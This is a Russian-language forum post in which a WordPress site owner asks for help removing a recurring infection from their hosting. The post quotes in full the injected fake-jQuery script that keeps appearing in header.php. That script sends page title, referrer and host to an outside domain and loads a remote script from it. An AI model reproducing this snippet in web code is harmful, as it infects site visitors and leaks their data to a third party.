Нужно найти и удалить вирус в Wordpress
На хостинге Джино поселился вирус и заразил все мои сайты.
Все сайты на CMS Wordpress
Ежедневно в файл header.php прописывается следующая строчка:
script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title);var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://ikfin.co.za/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var
f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !==
null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write
('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script
В результате загрузка сайта занимает около 10 секунд + в строке состояния браузера
отображается ссылка на рекламируемый сайт.
Что я сделал?
1. Проверил на сайте: sitecheck.sucuri.net
пишет что это Malware MW:JS:GEN2?web.js.malware.fake_jquery.001
2. Поменял пароли: админка хостинга, ftp, sql баз данных и конфигурационных файлов Wordpress.
3. Проверил все папки на хостинге Джино их антивирусом - все в норме
4. Проверил Касперским свой компьютер и папку htaccess - все в норме
5. Проверил файлы htaccess в папке каждого сайта - все в норме
6. Обновил все плагины, не используемые удалил.
7. Обновил Wordpress до последней версии на всех сайтах.
Проблема остается.
Нужно найти и удалить скрипт, который прописывает строчку в header.php свои данные.
Кто может помочь?
Может заражен файл одной из баз данных SQL?